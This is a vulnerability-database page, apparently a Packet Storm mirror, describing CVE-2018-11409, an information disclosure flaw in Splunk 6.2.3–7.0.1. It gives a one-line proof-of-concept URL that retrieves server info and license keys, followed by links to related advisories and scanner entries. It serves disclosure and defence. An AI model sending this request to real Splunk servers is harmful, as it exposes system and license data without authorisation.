Lucene search
KoF2002PACKETSTORM:148111HistoryJun 11, 2018 - 12:00 a.m.
Splunk 6.2.3 / 7.0.1 Information Disclosure
2018-06-1100:00:00
KoF2002
packetstormsecurity.com
44
0.896 High
EPSS
Percentile
98.5%
`# Exploit Title: Splunk < 7.0.1 - Information Disclosure
# Date: 2018-05-23
# Exploit Author: KoF2002
# Vendor Homepage: https://www.splunk.com/
# Version: 6.2.3 - 7.01 MAYBE ALL VERSION AFFECTED
# Tested on: Linux OS
# CVE : CVE-2018-11409
# Splunk through 6.2.3 7.0.1 allows information disclosure by appending
# /__raw/services/server/info/server-info?output_mode=json to a query,
# as demonstrated by discovering a license key and other information.
# PoC :
https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
# Greats : Cold z3ro , ihab pal and all HTLovers "We Are Back"
`
Related
prion
prion
Information disclosure
2018-06-08 12:29:00
nessus
nessus
Splunk Information Disclosure Vulnerability (SP-CAAAP5E)
2019-01-14 00:00:00
Splunk Information Exposure (SP-CAAAP5E
2019-01-14 00:00:00
hackerone
hackerone
U.S. Dept Of Defense: Splunk Sensitive Information Disclosure @████████
2023-02-03 07:36:53
zdt
zdt
Splunk < 7.0.1 - Information Disclosure Vulnerability
2018-06-09 00:00:00
exploitpack
exploitpack
Splunk 7.0.1 - Information Disclosure
2018-06-08 00:00:00
nuclei
nuclei
Splunk <=7.0.1 - Information Disclosure
2020-06-30 10:19:43
cve
cve
CVE-2018-11409
2018-06-08 12:29:00
exploitdb
exploitdb
Splunk < 7.0.1 - Information Disclosure
2018-06-08 00:00:00